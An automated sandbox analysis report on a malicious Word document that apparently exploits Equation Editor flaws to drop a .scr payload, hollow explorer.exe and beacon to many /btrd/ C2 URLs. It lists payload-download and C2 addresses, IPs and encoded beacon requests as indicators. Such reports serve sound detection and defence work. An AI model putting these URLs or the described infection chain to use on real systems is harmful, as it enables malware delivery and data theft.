      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C0BC8E RpcServerUseProtseqW,RpcServerInqBindings,RpcEpRegisterW,RpcServerRegisterIfEx,RpcServerRegisterAuthInfoW,RpcEpUnregister,RpcServerUnregisterIfEx,RpcBindingVectorFree,14_2_00C0BC8E
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C0FA9E RtlStringFromGUID,RtlNtStatusToDosError,memcpy,RtlFreeUnicodeString,CreateFileW,GetLastError,GetLastError,BindIoCompletionCallback,GetLastError,CloseHandle,14_2_00C0FA9E
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C082A4 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,RpcMgmtStopServerListening,14_2_00C082A4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C0BA7B RpcBindingToStringBindingW,RpcStringBindingParseW,RpcBindingInqAuthClientW,RpcStringFreeW,RpcStringFreeW,RpcStringFreeW,14_2_00C0BA7B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C0B425 RpcEpUnregister,RpcServerUnregisterIfEx,RpcBindingVectorFree,14_2_00C0B425
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C08188 EnterCriticalSection,EnterCriticalSection,LeaveCriticalSection,RpcMgmtWaitServerListen,EnterCriticalSection,LeaveCriticalSection,14_2_00C08188
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C0AFB0 RpcStringBindingComposeW,RpcBindingFromStringBindingW,RpcEpResolveBinding,RpcBindingSetOption,RpcMgmtInqServerPrincNameW,RpcBindingSetAuthInfoExW,RpcBindingSetAuthInfoW,RpcStringFreeW,RpcStringFreeW,RpcStringFreeW,14_2_00C0AFB0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C0AF1E RpcBindingFree,14_2_00C0AF1E

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      Abuse Elevation Control Mechanism      		1
      Disable or Modify Tools      		1
      Credential API Hooking      		1
      System Time Discovery      		Remote Services11
      Archive Collected Data      		5
      Ingress Tool Transfer      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Shared Modules      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		11
      Deobfuscate/Decode Files or Information      		LSASS Memory1
      File and Directory Discovery      		Remote Desktop Protocol1
      Credential API Hooking      		21
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts33
      Exploitation for Client Execution      		Logon Script (Windows)1
      Access Token Manipulation      		1
      Abuse Elevation Control Mechanism      		Security Account Manager214
      System Information Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook612
      Process Injection      		31
      Obfuscated Files or Information      		NTDS331
      Security Software Discovery      		Distributed Component Object ModelInput Capture114
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Software Packing      		LSA Secrets2
      Process Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Timestomp      		Cached Domain Credentials41
      Virtualization/Sandbox Evasion      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSync1
      Application Window Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Rootkit      		Proc Filesystem1
      Remote System Discovery      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
      Masquerading      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
      Virtualization/Sandbox Evasion      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
      Access Token Manipulation      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task612
      Process Injection      		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1462365 Sample: Order-1351125X.docx.doc Startdate: 25/06/2024 Architecture: WINDOWS Score: 100 51 www.furryfriendsupply.store 2->51 53 universalmovies.top 2->53 55 2 other IPs or domains 2->55 73 Snort IDS alert for network traffic 2->73 75 Found malware configuration 2->75 77 Malicious sample detected (through community Yara rule) 2->77 79 17 other signatures 2->79 12 WINWORD.EXE 313 54 2->12         started        signatures3 process4 dnsIp5 57 universalmovies.top 172.67.162.95, 443, 49166, 49167 CLOUDFLARENETUS United States 12->57 41 C:\Users\user\...\universalmovies.top.url, MS 12->41 dropped 43 C:\Users\user\AppData\...\nelb.doc.url, MS 12->43 dropped 45 ~WRF{ED1BAB3C-10CE...8-52F8AAAAA7A9}.tmp, Composite 12->45 dropped 105 Microsoft Office launches external ms-search protocol handler (WebDAV) 12->105 107 Office viewer loads remote template 12->107 109 Microsoft Office drops suspicious files 12->109 17 EQNEDT32.EXE 11 12->17         started        file6 signatures7 process8 dnsIp9 47 104.21.74.191, 443, 49173 CLOUDFLARENETUS United States 17->47 49 universalmovies.top 17->49 37 C:\Users\user\AppData\Roaming\nelb82019.scr, PE32 17->37 dropped 39 C:\Users\user\AppData\Local\...\nelb[1].scr, PE32 17->39 dropped 81 Office equation editor establishes network connection 17->81 83 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 17->83 22 nelb82019.scr 2 17->22         started        file10 signatures11 process12 signatures13 85 Multi AV Scanner detection for dropped file 22->85 87 Machine Learning detection for dropped file 22->87 89 Tries to detect virtualization through RDTSC time measurements 22->89 91 2 other signatures 22->91 25 nelb82019.scr 22->25         started        process14 signatures15 93 Modifies the context of a thread in another process (thread injection) 25->93 95 Maps a DLL or memory area into another process 25->95 97 Sample uses process hollowing technique 25->97 99 2 other signatures 25->99 28 explorer.exe 6 3 25->28 injected process16 dnsIp17 59 www.wzxq.xyz 28->59 61 www.wirewizardselectric.net 28->61 63 17 other IPs or domains 28->63 101 System process connects to network (likely due to code injection or exploit) 28->101 103 Performs DNS queries to domains with low reputation 28->103 32 wlanext.exe 28->32         started        signatures18 process19 signatures20 65 Modifies the context of a thread in another process (thread injection) 32->65 67 Maps a DLL or memory area into another process 32->67 69 Tries to detect virtualization through RDTSC time measurements 32->69 71 2 other signatures 32->71 35 cmd.exe 32->35         started        process21

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Order-1351125X.docx.doc32%ReversingLabsDocument-Office.Exploit.CVE-2017-0199

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{ED1BAB3C-10CE-436B-BF18-52F8AAAAA7A9}.tmp100%AviraEXP/CVE-2018-0798.Gen
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scr100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\nelb82019.scr100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nelb[1].scr37%ReversingLabsWin32.Trojan.Generic
      C:\Users\user\AppData\Roaming\nelb82019.scr37%ReversingLabsWin32.Trojan.Generic

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://ocsp.entrust.net030%URL Reputationsafe
      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
      http://ocsp.entrust.net0D0%URL Reputationsafe
      http://crl.entrust.net/server1.crl00%URL Reputationsafe
      http://www.nvzhuang1.netReferer:0%Avira URL Cloudsafe
      http://www.everslane.comReferer:0%Avira URL Cloudsafe
      http://www.mozilla.com00%Avira URL Cloudsafe
      http://www.cnoszirzbkaqz.com/btrd/www.naddafornadda.com100%Avira URL Cloudmalware
      https://universalmovies.top/nelb.scrj100%Avira URL Cloudphishing
      http://www.onlynaturlpt.shop/btrd/0%Avira URL Cloudsafe
      http://www.nvzhuang1.net0%Avira URL Cloudsafe
      https://support.mozilla.org0%URL Reputationsafe
      http://www.wirewizardselectric.netReferer:0%Avira URL Cloudsafe
      http://www.emeraldsurrogatefabric.comReferer:0%Avira URL Cloudsafe
      http://www.380747.net/btrd/www.emeraldsurrogatefabric.com0%Avira URL Cloudsafe
      https://secure.comodo.com/CPS00%URL Reputationsafe
      http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
      http://www.ngbbvuhkm5.asiaReferer:0%Avira URL Cloudsafe
      http://www.cnoszirzbkaqz.comReferer:0%Avira URL Cloudsafe
      http://www.emeraldsurrogatefabric.com0%Avira URL Cloudsafe
      https://universalmovies.top/nelb.scr100%Avira URL Cloudmalware
      http://www.turbrun.com/btrd/www.wzxq.xyz0%Avira URL Cloudsafe
      http://www.texanboxes.com/btrd/0%Avira URL Cloudsafe
      http://www.wzxq.xyz/btrd/www.texanboxes.com0%Avira URL Cloudsafe
      http://www.nvzhuang1.net/btrd/0%Avira URL Cloudsafe
      http://www.cnoszirzbkaqz.com/btrd/100%Avira URL Cloudmalware
      http://www.martline.website/btrd/0%Avira URL Cloudsafe
      http://www.wzxq.xyzReferer:0%Avira URL Cloudsafe
      http://www.turbrun.comReferer:0%Avira URL Cloudsafe
      http://www.outletivo.com/btrd/www.380747.net100%Avira URL Cloudmalware
      http://www.ngbbvuhkm5.asia/btrd/www.everslane.com0%Avira URL Cloudsafe
      http://www.outletivo.com/btrd/100%Avira URL Cloudmalware
      https://universalmovies.top/nelb.scrll100%Avira URL Cloudphishing
      http://www.outletivo.com/btrd/?QF=wAVsI0ZauuZe/AUfKMQS9arC9N7mEche6F3f3LieAEN9BV05ageRHgJkodQ/PaJpE4394Q==&rr=F82tHBM8VV6X-vo100%Avira URL Cloudmalware
      http://www.texanboxes.com0%Avira URL Cloudsafe
      http://www.emeraldsurrogatefabric.com/btrd/?QF=G5lr6/+HMLb4/5wZr2dUNb9GEJVmzQOhD2on9EEX18ujBqnljNww4TGU/x6wH+Q7WyKaqg==&rr=F82tHBM8VV6X-vo0%Avira URL Cloudsafe
      http://www.agriwithai.com0%Avira URL Cloudsafe
      http://www.furryfriendsupply.storeReferer:0%Avira URL Cloudsafe
      http://www.autoitscript.com/autoit30%Avira URL Cloudsafe
      http://www.martline.website/btrd/www.cnoszirzbkaqz.com0%Avira URL Cloudsafe
      http://www.wzxq.xyz0%Avira URL Cloudsafe
      http://www.ngbbvuhkm5.asia/btrd/0%Avira URL Cloudsafe
      http://www.cnoszirzbkaqz.com/btrd/?QF=iWZ7HQ0CWyfkF/Kk3421ksonIyAGE9NlyJN9a/ri56tzwIjQ6AOy1EoBknvhN8HBdF2LXg==&rr=F82tHBM8VV6X-vo100%Avira URL Cloudmalware
      http://www.naddafornadda.com0%Avira URL Cloudsafe
      http://www.380747.netReferer:0%Avira URL Cloudsafe
      http://www.martline.website0%Avira URL Cloudsafe
      http://www.texanboxes.com/btrd/www.outletivo.com0%Avira URL Cloudsafe
      https://universalmovies.top/nelb.doc100%Avira URL Cloudphishing
      http://www.agriwithai.com/btrd/www.ngbbvuhkm5.asia100%Avira URL Cloudmalware
      http://www.outletivo.com100%Avira URL Cloudmalware
      http://www.piriform.com/ccleanerxe0%Avira URL Cloudsafe
      http://www.onlynaturlpt.shop/btrd/?QF=ei06BbrL1XNnLWKSHbPo044PuME3Vv+0MArEui1DSIZtlWDrcB5dDFtUvldPnIarUtM2xw==&rr=F82tHBM8VV6X-vo0%Avira URL Cloudsafe
      http://www.turbrun.com0%Avira URL Cloudsafe
      https://universalmovies.top/nelb.scrula100%Avira URL Cloudphishing
      http://www.wirewizardselectric.net/btrd/?QF=4g1xeR4m3EPNXFQvrJzB56K+BPAX9uki7kS+nMlSCcqOR13OJ5fSn6jCC3gh4c3HUzbxQw==&rr=F82tHBM8VV6X-vo0%Avira URL Cloudsafe
      http://www.emeraldsurrogatefabric.com/btrd/www.furryfriendsupply.store0%Avira URL Cloudsafe
      http://www.furryfriendsupply.store/btrd/www.agriwithai.com0%Avira URL Cloudsafe
      http://www.everslane.com/btrd/www.nvzhuang1.net0%Avira URL Cloudsafe
      http://www.agriwithai.com/btrd/100%Avira URL Cloudmalware
      http://www.outletivo.comReferer:0%Avira URL Cloudsafe
      http://www.ngbbvuhkm5.asia0%Avira URL Cloudsafe
      http://www.onlynaturlpt.shopReferer:0%Avira URL Cloudsafe
      http://www.furryfriendsupply.store/btrd/0%Avira URL Cloudsafe
      http://www.furryfriendsupply.store0%Avira URL Cloudsafe
      http://www.naddafornadda.comReferer:0%Avira URL Cloudsafe
      www.cnoszirzbkaqz.com/btrd/100%Avira URL Cloudmalware
      http://www.wzxq.xyz/btrd/0%Avira URL Cloudsafe
      http://www.naddafornadda.com/btrd/0%Avira URL Cloudsafe
      http://www.martline.websiteReferer:0%Avira URL Cloudsafe
      http://www.texanboxes.com/btrd/?QF=8JOSXYLBILqnqGN87u1l6qhyR4gCsQ4B50iPBg5WSNoqgl4+2/FdKIi+y78puliTpEIA7Q==&rr=F82tHBM8VV6X-vo0%Avira URL Cloudsafe
      http://java.sun.com0%Avira URL Cloudsafe
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
      https://universalmovies.top/100%Avira URL Cloudphishing
      https://universalmovies.top/nelb.scriiC:100%Avira URL Cloudphishing
      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv0%Avira URL Cloudsafe
      http://www.texanboxes.comReferer:0%Avira URL Cloudsafe
      http://www.everslane.com0%Avira URL Cloudsafe
      http://www.emeraldsurrogatefabric.com/btrd/0%Avira URL Cloudsafe
      http://www.naddafornadda.com/btrd/?QF=Y4OHzCgJWVe/aTk998zcBEsdCVoOVR410Fz81Fwxat8Qm64dtgVu5ywIvZ7n99il4dROUQ==&rr=F82tHBM8VV6X-vo0%Avira URL Cloudsafe
      http://www.wirewizardselectric.net/btrd/0%Avira URL Cloudsafe
      http://www.380747.net/btrd/0%Avira URL Cloudsafe
      http://www.onlynaturlpt.shop0%Avira URL Cloudsafe
      http://www.piriform.com/ccleaner0%Avira URL Cloudsafe
      http://www.turbrun.com/btrd/0%Avira URL Cloudsafe
      http://www.wirewizardselectric.net0%Avira URL Cloudsafe
      http://www.wirewizardselectric.net/btrd/www.martline.website0%Avira URL Cloudsafe
      http://www.380747.net/btrd/?QF=Q9lQV6GZS5XlTzDabQN0JcC/oAJcX56bqSzBmZTdiCofqsMdr9nyT/BrN0q/NN7gaO6C5w==&rr=F82tHBM8VV6X-vo0%Avira URL Cloudsafe
      http://www.cnoszirzbkaqz.com100%Avira URL Cloudmalware
      http://www.380747.net0%Avira URL Cloudsafe
      http://www.everslane.com/btrd/0%Avira URL Cloudsafe
      https://google.com0%Avira URL Cloudsafe
      http://www.naddafornadda.com/btrd/www.turbrun.com0%Avira URL Cloudsafe
      http://www.agriwithai.comReferer:0%Avira URL Cloudsafe
      http://www.onlynaturlpt.shop/btrd/www.wirewizardselectric.net0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      wirewizardselectric.net
      		15.197.148.33
      		truetrue
        		unknown
        universalmovies.top
        		172.67.162.95
        		truetrue
          		unknown
          www.onlynaturlpt.shop
          		104.21.89.47
          		truetrue
            		unknown
            naddafornadda.com
            		15.197.148.33
            		truetrue
              		unknown
              cnoszirzbkaqz.com
              		167.172.228.26
              		truetrue
                		unknown
                texanboxes.com
                		3.33.130.190
                		truetrue
                  		unknown
                  www.380747.net
                  		156.241.141.214
                  		truetrue
                    		unknown
                    shops.myshopify.com
                    		23.227.38.74
                    		truetrue
                      		unknown
                      www.emeraldsurrogatefabric.com
                      		192.243.61.225
                      		truetrue
                        		unknown
                        www.outletivo.com
                        		5.149.161.103
                        		truetrue
                          		unknown
                          www.naddafornadda.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.cnoszirzbkaqz.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.wirewizardselectric.net
                              		unknown
                              		unknowntrue
                                		unknown
                                www.wzxq.xyz
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.texanboxes.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.turbrun.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.furryfriendsupply.store
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        https://universalmovies.top/nelb.scrtrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.outletivo.com/btrd/?QF=wAVsI0ZauuZe/AUfKMQS9arC9N7mEche6F3f3LieAEN9BV05ageRHgJkodQ/PaJpE4394Q==&rr=F82tHBM8VV6X-votrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.emeraldsurrogatefabric.com/btrd/?QF=G5lr6/+HMLb4/5wZr2dUNb9GEJVmzQOhD2on9EEX18ujBqnljNww4TGU/x6wH+Q7WyKaqg==&rr=F82tHBM8VV6X-votrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.cnoszirzbkaqz.com/btrd/?QF=iWZ7HQ0CWyfkF/Kk3421ksonIyAGE9NlyJN9a/ri56tzwIjQ6AOy1EoBknvhN8HBdF2LXg==&rr=F82tHBM8VV6X-votrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://universalmovies.top/nelb.doctrue
                                        • Avira URL Cloud: phishing
                                        		unknown
                                        http://www.onlynaturlpt.shop/btrd/?QF=ei06BbrL1XNnLWKSHbPo044PuME3Vv+0MArEui1DSIZtlWDrcB5dDFtUvldPnIarUtM2xw==&rr=F82tHBM8VV6X-votrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.wirewizardselectric.net/btrd/?QF=4g1xeR4m3EPNXFQvrJzB56K+BPAX9uki7kS+nMlSCcqOR13OJ5fSn6jCC3gh4c3HUzbxQw==&rr=F82tHBM8VV6X-votrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        www.cnoszirzbkaqz.com/btrd/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.texanboxes.com/btrd/?QF=8JOSXYLBILqnqGN87u1l6qhyR4gCsQ4B50iPBg5WSNoqgl4+2/FdKIi+y78puliTpEIA7Q==&rr=F82tHBM8VV6X-votrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.naddafornadda.com/btrd/?QF=Y4OHzCgJWVe/aTk998zcBEsdCVoOVR410Fz81Fwxat8Qm64dtgVu5ywIvZ7n99il4dROUQ==&rr=F82tHBM8VV6X-votrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.380747.net/btrd/?QF=Q9lQV6GZS5XlTzDabQN0JcC/oAJcX56bqSzBmZTdiCofqsMdr9nyT/BrN0q/NN7gaO6C5w==&rr=F82tHBM8VV6X-votrue
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.onlynaturlpt.shop/btrd/explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.emeraldsurrogatefabric.comReferer:explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.nvzhuang1.netReferer:explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://universalmovies.top/nelb.scrjEQNEDT32.EXE, 00000009.00000002.398265813.00000000005AF000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: phishing
                                        		unknown
                                        http://www.wirewizardselectric.netReferer:explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://ocsp.entrust.net03EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.mozilla.com0explorer.exe, 0000000D.00000000.401767743.0000000002177000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.923732332.0000000002177000.00000004.00000010.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.380747.net/btrd/www.emeraldsurrogatefabric.comexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.everslane.comReferer:explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.nvzhuang1.netexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.cnoszirzbkaqz.com/btrd/www.naddafornadda.comexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.cnoszirzbkaqz.com/btrd/explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.emeraldsurrogatefabric.comexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.ngbbvuhkm5.asiaReferer:explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.wzxq.xyz/btrd/www.texanboxes.comexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.cnoszirzbkaqz.comReferer:explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.nvzhuang1.net/btrd/explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.texanboxes.com/btrd/explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.turbrun.com/btrd/www.wzxq.xyzexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.martline.website/btrd/explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.turbrun.comReferer:explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.wzxq.xyzReferer:explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.ngbbvuhkm5.asia/btrd/www.everslane.comexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://universalmovies.top/nelb.scrllEQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: phishing
                                        		unknown
                                        http://www.outletivo.com/btrd/explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.outletivo.com/btrd/www.380747.netexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.texanboxes.comexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.agriwithai.comexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.furryfriendsupply.storeReferer:explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.martline.website/btrd/www.cnoszirzbkaqz.comexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.ngbbvuhkm5.asia/btrd/explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.autoitscript.com/autoit3explorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.wzxq.xyzexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://ocsp.entrust.net0DEQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.380747.netReferer:explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.naddafornadda.comexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.texanboxes.com/btrd/www.outletivo.comexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.martline.websiteexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.agriwithai.com/btrd/www.ngbbvuhkm5.asiaexplorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
